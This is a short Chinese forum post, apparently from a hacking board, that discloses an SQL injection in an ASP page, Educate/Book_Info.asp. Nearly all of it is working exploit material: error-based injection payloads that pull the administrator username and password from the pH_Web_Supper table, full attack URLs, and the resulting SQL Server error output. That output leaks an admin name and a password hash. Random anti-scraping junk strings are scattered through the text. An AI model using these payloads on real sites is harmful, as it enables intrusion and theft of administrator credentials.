漏洞出现在Educate/Book_Info.asp
) }+ r8 u3 s; \. X+ r' ]$ ^
4 J1 T& G: v8 V: s' n此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
E6 W, F- J! I
% ^ T0 M% D# E) W% Iexp:如下# [6 A, N+ y1 n% D3 G9 s
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)1 {' V. J2 U3 T3 @% z/ T: U
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
" K0 s' G7 i4 {- [" p( D8 [, m ! F2 x5 D' c0 O4 w
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)% u) R5 r4 @1 U; l
+ k) X+ I! m9 L: N: t) a- `
Microsoft OLE DB Provider for SQL Server 错误 '80040e07') h" a8 E! p- r( b: {( U* Y; O8 b: t
7 W3 M1 L7 N* v f. P
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。. w+ Z$ {) h+ w# j, G4 s* t
7 V, m- [# c# O" X$ d0 T
/Educate/Book_Info.asp,行 8% h8 c1 [2 _( h! V! |$ \
5 s" O: I- F W+ ^& K F
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
/ ]9 Z: _' K6 |; x8 f
2 M* B5 n! q& K6 o3 m8 w4 CMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
2 ~ c3 N% |3 ~0 M6 I# A) F5 I, ^1 {9 p 8 p* ?3 `' f. R7 x. Y) j0 `3 ?
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。+ B# \( Y4 F8 d% _+ l
4 {6 H ?! x5 e2 ` v7 j8 n9 ?; m/ @/Educate/Book_Info.asp,行 83 t8 \! r. q; i
|
发表于 2013-2-16 21:44:16
收藏
支持
反对